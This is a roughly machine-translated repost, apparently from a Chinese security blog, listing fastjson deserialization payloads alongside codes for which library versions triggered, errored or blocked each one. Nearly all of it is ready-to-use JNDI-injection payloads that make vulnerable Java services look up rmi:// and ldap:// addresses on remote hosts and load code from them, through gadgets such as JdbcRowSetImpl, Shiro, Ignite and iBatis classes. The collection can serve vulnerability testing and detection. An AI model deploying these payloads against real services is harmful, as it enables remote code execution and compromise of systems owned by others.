fastjson の脆弱性のさまざまなバージョンのペイロード テスト

備考: 0: エラーは報告されず、トリガーもありません 1: エラーは報告されましたが、ブラックリストに登録されていません 2: ブラックリストによってブロックされているか、ポップ チェーンが存在しません 62、1.2.67 、1.2.68、2 が 2 回連続して表示される場合は、次のようにみなし
ます
。後続のバージョンは適用されず、引き続き検出されません。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
1.2.24、2、2

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
1.2.24、2、2

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
1.2.24、2、2

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
1.2.24、2、2

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
0、2、2

{"a":{"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x.x.x.x:1999/Exploit","autoCommit": true}}
1.2.24、1.2.41、1.2.42、1.2.47、2、2

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
0、2、2

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
0、2、2

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
0、2、2

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}
0、2、2

{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"rmi://39.99.154.30:1099/TouchFile"}}}
1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)

{"a":{"@type": "java.lang.AutoCloseable", "@type":"java.io.Reader"},"rand1":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dns_rmi_url"}}}
1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"dns_rmi_url"}
0、2、2

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns_rmi_url"}
0、2、2

{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"dns_rmi_url"}, "namespace":""}
0、2、2

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns_rmi_url"}}
0、2、2

{"@type":"com.caucho.config.types.ResourceRef","lookupName": "dns_rmi_url"}
0、2、2

{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["dns_rmi_url"], "Realms":[""]}
0、2、2

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns_rmi_url"}
0、2、2

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames": "dns_rmi_url"}
0、2、2

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName": "dns_rmi_url"}
0、2、2

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns_rmi_url","autoCommit":true}
1.2.14、2、2

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"test":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns_rmi_url","autoCommit":true}}}
1.2.14、1.2.41、1.2.42、1.2.47、2、2

{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns_rmi_url", "rollbackOnly":null}
0、2、2

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns_rmi_url"}
0、2、2

おすすめ

転載: blog.csdn.net/weixin_46706771/article/details/125716260